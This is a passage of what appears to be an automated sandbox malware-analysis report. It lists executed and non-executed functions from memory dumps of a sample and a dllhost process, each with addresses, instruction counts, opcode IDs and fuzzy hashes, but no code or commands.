                                                    • Instruction Fuzzy Hash: 23F0E53525E689CFD741A738C8A16D4BFA0EF03209F4A11EAC489C7963D214585DCB41
                                                    Function 00007FFD9B8928F1 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8cd932901108484ecbd1028138cfcf107a4298210c603351e4cb55657a5c86bf
                                                    • Instruction ID: ec5ad483bb3efd2e72b375a089abd2d58b36189eb7ab0fa2f9a96cd09fbe77f8
                                                    • Opcode Fuzzy Hash: 8cd932901108484ecbd1028138cfcf107a4298210c603351e4cb55657a5c86bf
                                                    • Instruction Fuzzy Hash: 3AF05E30B1A50E8BEFB8DBD4C8A47B83751EF58311F014275D44DA72F2CD29AF858A40
                                                    Function 00007FFD9B89708D Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 11d47517605fa365616f1bc5108bf7340daef58e1c6120019b67247a5ac9dd3f
                                                    • Instruction ID: 9f6aacdc4b264e02c7040e5d4e17a3e8f7e84f57516213c08f7f68546743d208
                                                    • Opcode Fuzzy Hash: 11d47517605fa365616f1bc5108bf7340daef58e1c6120019b67247a5ac9dd3f
                                                    • Instruction Fuzzy Hash: 4BE01212F5D54D46FBBCA3A858363B854C2EF9C704F4A41B9A05DC32D3DC482D800393
                                                    Function 00007FFD9B8906A5 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e9c3a768ca4a15c833beaef444c98401a766ec53a568349f7243ec7c344a2d83
                                                    • Instruction ID: ad2f4052b067b61a18b6528d92cd979851e1deb705113a0321c9aa4fc3d8a01e
                                                    • Opcode Fuzzy Hash: e9c3a768ca4a15c833beaef444c98401a766ec53a568349f7243ec7c344a2d83
                                                    • Instruction Fuzzy Hash: F1C04C06F6B61F41FC3673EE98660ACA9406FDDF10FD70172D64D500E1AD4D22D54156
                                                    Function 00007FFD9B890848 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 357baf54a18fbec0c068af6c39e917b84b8ac1f83436bfccbdac3267fcba0015
                                                    • Instruction ID: f5afea7c36a37803931b794cf177333dd33fbab8ee6d41c43c70345e4a960aca
                                                    • Opcode Fuzzy Hash: 357baf54a18fbec0c068af6c39e917b84b8ac1f83436bfccbdac3267fcba0015
                                                    • Instruction Fuzzy Hash: B2C08C3461180C8FC908EB28C88480437A0FB0D200BC20090E009C7170E229DCC1C740
                                                    Function 00007FFD9B894015 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: de2915e4b3f3d02ad5128240c18b2f79ae5fc8f7bd4b9e18c8a072f88f83e8ba
                                                    • Instruction ID: 7c179d6ff6f1e71a7a6a56a87be7cf0c386b8194659aea7c98e8eb4748656b83
                                                    • Opcode Fuzzy Hash: de2915e4b3f3d02ad5128240c18b2f79ae5fc8f7bd4b9e18c8a072f88f83e8ba
                                                    • Instruction Fuzzy Hash: 87C04C40F1D81A16F75AB75898316BE48539B84744FD504B5E42E972CECE9C994202D7
                                                    Function 00007FFD9B8906C8 Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ae72c574db76d6c85465251d491aaf8998b500b8fcddd359cf8eba7dae60f7b
                                                    • Instruction ID: 72f6aa97fb536398eea38e94ab17466f98f739a3eecab6c46c8b1349559f7bc5
                                                    • Opcode Fuzzy Hash: 7ae72c574db76d6c85465251d491aaf8998b500b8fcddd359cf8eba7dae60f7b
                                                    • Instruction Fuzzy Hash: F5B01200D6740F01EC2433FA08620A478406B4C600FC60070D80D50091A84D12940242

                                                    Non-executed Functions

                                                    Function 00007FFD9BC6C72B Relevance: .1, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1893446128.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bc60000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e36abf0f59aeba5f868410bc8cea51eeb02b858631aca75e3835dada30b5779
                                                    • Instruction ID: a48ddb4e3d613ded0b57cc24cf59bcb29a5e019e873b055d76a3f26c5995c770
                                                    • Opcode Fuzzy Hash: 6e36abf0f59aeba5f868410bc8cea51eeb02b858631aca75e3835dada30b5779
                                                    • Instruction Fuzzy Hash: 8A513F30A1951DCFDB58EBA4C869ABD77B1FF58304F610579E01AD72A9CF35A842CB40
                                                    Function 00007FFD9B8909B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1889914819.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_UuIspZT5b6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845
                                                    • Opcode ID: e04915cc82d030085f3452353eb915b34d207cd6d2f43e59546fef3118dd530a
                                                    • Instruction ID: 8f7ace8b044e1fd3fa902ae7a00ee120a14cf4ab20fe5cd60dd930381f958173
                                                    • Opcode Fuzzy Hash: e04915cc82d030085f3452353eb915b34d207cd6d2f43e59546fef3118dd530a
                                                    • Instruction Fuzzy Hash: 1841CF87B1953685E31F33FC792A9ED5B84CF8527DB0842B7E16E8A0C75C88608393E5

                                                    Executed Functions

                                                    Function 00007FFD9B8C0BC5 Relevance: .4, Instructions: 436COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 980b928141c660dbb6dab3bde4a0bef340553ed055385dcab7e1da71f4895c31
                                                    • Instruction ID: 23faecffda9e0ff94e416c8c4e54ee481fc9aa88fb66fdec3d4f5136ba0a98d8
                                                    • Opcode Fuzzy Hash: 980b928141c660dbb6dab3bde4a0bef340553ed055385dcab7e1da71f4895c31
                                                    • Instruction Fuzzy Hash: 6BB1F161A6F69E0AE32D67580C930B07791EF86B45B1A83BEC9DBC7097DD18750382C2
                                                    Function 00007FFD9B890D78 Relevance: .3, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cd92ff81fefe6ef2211835e8a9e64d39c12e36a44bec4c44897ea20151e1580d
                                                    • Instruction ID: 8568a05c46cd0a427d67f96c425482404fdc0e2a2459655f053b0625d802c7fd
                                                    • Opcode Fuzzy Hash: cd92ff81fefe6ef2211835e8a9e64d39c12e36a44bec4c44897ea20151e1580d
                                                    • Instruction Fuzzy Hash: C5913275A18A9D8FEB89DB688C697B9BFE1FF99300F4041BAD149C72D2EB781414C341
                                                    Function 00007FFD9B8B5739 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M
                                                    • API String ID: 0-3664761504
                                                    • Opcode ID: 46efbf11690b83a8fa3a1f7afd35ea82b8c5f5257f751bb3bf3b14fec629ee7b
                                                    • Instruction ID: 9c1c9efa9a1d879a35c59a617fd63250d1d0f7c5081eec22b5eab92a9e13bd36
                                                    • Opcode Fuzzy Hash: 46efbf11690b83a8fa3a1f7afd35ea82b8c5f5257f751bb3bf3b14fec629ee7b
                                                    • Instruction Fuzzy Hash: BFF0306164F3D54FCB169A748868855BF60AE6720174A52EEC046CF2A3EA199886C741
                                                    Function 00007FFD9B8A3AF9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M
                                                    • API String ID: 0-3664761504
                                                    • Opcode ID: 2a3c804da30aa7012f7911daf81a40d09a04422539034b65641b851e39802886
                                                    • Instruction ID: 8decbac5f41816ad35e8318589b22022548396668362d9245322756e02a4f705
                                                    • Opcode Fuzzy Hash: 2a3c804da30aa7012f7911daf81a40d09a04422539034b65641b851e39802886
                                                    • Instruction Fuzzy Hash: 3CF0306164F3D44FCB169A7488648557F60AE6721174A52EFC045CF1E3EA1DD886C741
                                                    Function 00007FFD9B8B9089 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: I
                                                    • API String ID: 0-3707901625
                                                    • Opcode ID: 129eb3d3ff204ca6500df296fdfa8af55b01df7b164495c77df5a88c6f1417a3
                                                    • Instruction ID: d74a9d4e0ef9954ea30dfcbdabaa96045ea708ebcff79d82c888d7e00ccd9317
                                                    • Opcode Fuzzy Hash: 129eb3d3ff204ca6500df296fdfa8af55b01df7b164495c77df5a88c6f1417a3
                                                    • Instruction Fuzzy Hash: A7E0ED6154F3D44FCB1A9B748869C553F70AE6721074B41DEC185CF5B3E6299949C701
                                                    Function 00007FFD9B8C1779 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: I
                                                    • API String ID: 0-3707901625
                                                    • Opcode ID: 2c2eb82684aa9f6d5ea08ea8de07b566c523520a3325251f70b3d793d86ab811
                                                    • Instruction ID: ad0a08ba5f9e8f75bb64d1cae9f7b79f31db6bfb264ffdbe6ef147426394d88d
                                                    • Opcode Fuzzy Hash: 2c2eb82684aa9f6d5ea08ea8de07b566c523520a3325251f70b3d793d86ab811
                                                    • Instruction Fuzzy Hash: 8CE09AA180F3C08FCB06EB3488698543FA0AE6B21078B40EFC085CF0B3E62D8949C701
                                                    Function 00007FFD9B8B9239 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: I
                                                    • API String ID: 0-3707901625
                                                    • Opcode ID: 8b19f0b12432f763b4998f8e53716802abe65fb5149c90dcaae302e9d3ab622d
                                                    • Instruction ID: 3b94c10b6db2e024ea83d7aca2d00bdb06ab238b1ed86ec93d7a29c6d26db6b4
                                                    • Opcode Fuzzy Hash: 8b19f0b12432f763b4998f8e53716802abe65fb5149c90dcaae302e9d3ab622d
                                                    • Instruction Fuzzy Hash: 47E01A6194E7D44FCB56EB74887A8547FA0EE6B21178B40EEC185CF1B3E62D8849CB01
                                                    Function 00007FFD9B8A0A26 Relevance: .8, Instructions: 807COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c67bb75905b8b21b98ecb947ee72c4e07c05321b985d787c2e3f24a5c0710679
                                                    • Instruction ID: 23c5a9847197b9e4e47eae54b29447afaa0bea060678ac420d66b2d57692ffb1
                                                    • Opcode Fuzzy Hash: c67bb75905b8b21b98ecb947ee72c4e07c05321b985d787c2e3f24a5c0710679
                                                    • Instruction Fuzzy Hash: 60421731B1D94E4FEBA8EB5888A16B477D2FF58700F1546B9D01EC32D2DE34AD868741
                                                    Function 00007FFD9B8A169E Relevance: .7, Instructions: 687COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 95468dae68ba84c8fd982009f7cec463ecc94799ea6f25b3ffbc3851f1d55759
                                                    • Instruction ID: 85ed53ba4f59c219a1099bd782d126bad864c27c9c52e82d45f30c8a2ac10ce2
                                                    • Opcode Fuzzy Hash: 95468dae68ba84c8fd982009f7cec463ecc94799ea6f25b3ffbc3851f1d55759
                                                    • Instruction Fuzzy Hash: 6A220631B1D94E4FEBA8EB5888A167473A2FF58300F1546B9D01EC32E7ED34B9868741
                                                    Function 00007FFD9B8A10C5 Relevance: .4, Instructions: 446COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b847efd7b84eb77f1c38ec8f5f850c70cc828cd3900337e83597cb6e4f166f9a
                                                    • Instruction ID: 89448286b5e3bb5f549baf8820e8dfc29475f48ec9b2cb9bf1aa475901d42489
                                                    • Opcode Fuzzy Hash: b847efd7b84eb77f1c38ec8f5f850c70cc828cd3900337e83597cb6e4f166f9a
                                                    • Instruction Fuzzy Hash: F8E1E331B1D90E4FEB68EB5888A167577A2FF99300F1545B9D01EC32E6EE34AD42C740
                                                    Function 00007FFD9B8A1061 Relevance: .4, Instructions: 397COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 94bfef6038da78a43c13e51e32542148eb302b3b29685e7dc8329cf4fa617a20
                                                    • Instruction ID: d3a99a26ada1a7e93b0f8eff556f56f0ff5afaeb251c652bef03221d956781e0
                                                    • Opcode Fuzzy Hash: 94bfef6038da78a43c13e51e32542148eb302b3b29685e7dc8329cf4fa617a20
                                                    • Instruction Fuzzy Hash: 60D11531B1E94E4FEB68EB6888A167477A2FF99300F1545B9D05EC32D7DE38A942C740
                                                    Function 00007FFD9B8A0FE0 Relevance: .4, Instructions: 359COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc78f83f05e7bd1034e4be3faf356db6739edb223b10cd6f8386207b9494ec63
                                                    • Instruction ID: 62e2316b1d4c32db3ccfb5f820ac76823dd0a6a984d394a1d280981add86c5c3
                                                    • Opcode Fuzzy Hash: dc78f83f05e7bd1034e4be3faf356db6739edb223b10cd6f8386207b9494ec63
                                                    • Instruction Fuzzy Hash: FDC1F431B1D90E4BEB6CEB5888A167877A2FF99340F1545B9D05EC32D7DE34A942C740
                                                    Function 00007FFD9B8A1024 Relevance: .4, Instructions: 359COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ca50733c758b9b1bfca6c5a29cbfada56e889ed359c53be7d8d60937e78b36f3
                                                    • Instruction ID: 3053db46bd9b3a35ffb8685b30a8f9f575ff28b9c962d23e1ead3a12dfc196e3
                                                    • Opcode Fuzzy Hash: ca50733c758b9b1bfca6c5a29cbfada56e889ed359c53be7d8d60937e78b36f3
                                                    • Instruction Fuzzy Hash: DCC1F431B1DA0E4BEB6CEB6888A167877A2FF99340F1545B9D05EC32D7DE34A942C740
                                                    Function 00007FFD9B8A0F9C Relevance: .4, Instructions: 359COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 180f3b9f408f2bcff76eb4c335b810a8d5cb6c55b7d35e98c55c86e1af0bf0d2
                                                    • Instruction ID: 4995e78625db145d0ddd0d9531e30fe10ba24b17ec6da03552894948cf20f801
                                                    • Opcode Fuzzy Hash: 180f3b9f408f2bcff76eb4c335b810a8d5cb6c55b7d35e98c55c86e1af0bf0d2
                                                    • Instruction Fuzzy Hash: D9C1F431B1DA0E4BEB6CEB6888A167877A2FF99340F1545B9D05EC32D7DE34A942C740
                                                    Function 00007FFD9B8A0F14 Relevance: .4, Instructions: 359COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 95a07a72212b39e3d6e4a7f604ee001ae54a9139e2ccf3a72eeac14213348476
                                                    • Instruction ID: 97a19a2d60de57116c25a6385014609fabf8eed1d690bb29777d369bf945bc3c
                                                    • Opcode Fuzzy Hash: 95a07a72212b39e3d6e4a7f604ee001ae54a9139e2ccf3a72eeac14213348476
                                                    • Instruction Fuzzy Hash: B0C1F431B1DA0E4BEB6CEB6888A167877A2FF99340F1545B9D05EC32D7DE34A942C740
                                                    Function 00007FFD9B8A0F58 Relevance: .4, Instructions: 359COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8c575d1f1dbb23bb91fa9590cc0ebf7c482d2b6e2a430a6fa3779e76a6b57605
                                                    • Instruction ID: 68e95ce38ab9e8842cba7db364fd95b6e09057dcdb6075942657180606d983e6
                                                    • Opcode Fuzzy Hash: 8c575d1f1dbb23bb91fa9590cc0ebf7c482d2b6e2a430a6fa3779e76a6b57605
                                                    • Instruction Fuzzy Hash: 4CC1F431B1DA0E4BEB6CEB6888A167877A2FF99340F1545B9D05EC32D7DE34A942C740
                                                    Function 00007FFD9B8A0ED0 Relevance: .4, Instructions: 359COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 328204bd66af095a3989a352f372657c9531f34e5c261883217bd8e8865d8c2f
                                                    • Instruction ID: 604ea5ac95152cb69deed42bc3c7593b4105850c6c8ba541c4c8f6f89ebca93f
                                                    • Opcode Fuzzy Hash: 328204bd66af095a3989a352f372657c9531f34e5c261883217bd8e8865d8c2f
                                                    • Instruction Fuzzy Hash: 54C1F431B1DA0E4BEB6CEB6888A167877A2FF99340F1545B9D05EC32D7DE34A942C740
                                                    Function 00007FFD9B8C2E25 Relevance: .3, Instructions: 296COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f5ae8e5c953b3b12549ce38b89414544bd8dfd0b2f43c2d4645c6725bec98f22
                                                    • Instruction ID: 9a045081c75301155feec48ab0de107ce1ff0efbbaa0d02153ca999fb26203aa
                                                    • Opcode Fuzzy Hash: f5ae8e5c953b3b12549ce38b89414544bd8dfd0b2f43c2d4645c6725bec98f22
                                                    • Instruction Fuzzy Hash: 2091F6A1B2DA4E0EEBACFB9884B667573D2EF98300F0441BAD40DC71D7ED28A9464341
                                                    Function 00007FFD9B8B92D3 Relevance: .2, Instructions: 204COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7ff32b4a5d6a76bbb3bcaebebf13ac241eeab24f1ea6c1265c2001a03791460
                                                    • Instruction ID: c5eafb880971a7d262ae6b41ddddf78aa71adaf60f9fde9763b7b7f4617f56c9
                                                    • Opcode Fuzzy Hash: a7ff32b4a5d6a76bbb3bcaebebf13ac241eeab24f1ea6c1265c2001a03791460
                                                    • Instruction Fuzzy Hash: 1D61C934B189194FDB59EB68C8A4AB973E2FF9C304F5145B9D11DC32D6DE38A841CB81
                                                    Function 00007FFD9B8B936D Relevance: .1, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cdf711f45afaacfa7cbc1f43f69522c0e0f7762d1f9cb970f1ff14a0a2c5a07e
                                                    • Instruction ID: 47f837ec44f9dbe42af6eec7f2bc375744685decfa6d95c7ea1d06f715579fd6
                                                    • Opcode Fuzzy Hash: cdf711f45afaacfa7cbc1f43f69522c0e0f7762d1f9cb970f1ff14a0a2c5a07e
                                                    • Instruction Fuzzy Hash: 34413030B1891A8FDB58EB6CC498AB877E2FB9C310F5145B9D01EC76D5DB39E8418B80
                                                    Function 00007FFD9B890908 Relevance: .1, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e2c0361ea08d3e068ab34cc65cd79e5233918d219d6109d272177c6085778e24
                                                    • Instruction ID: 6b0d3857097c0c39b3b21018850544af27ca86e0bd93f3b5fbe0ec2a6bffd228
                                                    • Opcode Fuzzy Hash: e2c0361ea08d3e068ab34cc65cd79e5233918d219d6109d272177c6085778e24
                                                    • Instruction Fuzzy Hash: F221E63130D9184FEB68EB4CE889EB977D1FB4932131501BAE58EC7136E911EC8287C1
                                                    Function 00007FFD9B890998 Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5e2b0fbf3759ef4a8ae683b6204437cdbb778200bc97bc62547b76afc9059b6
                                                    • Instruction ID: 7d71aba97c57969a3cef8eb052fbec03c85bf8490f8b95c8c695e55616cb7146
                                                    • Opcode Fuzzy Hash: b5e2b0fbf3759ef4a8ae683b6204437cdbb778200bc97bc62547b76afc9059b6
                                                    • Instruction Fuzzy Hash: E0210620B1D91D0FEB58B76C986A679BBC2EBDC711B1101B9E40EC32F7ED24AC424281
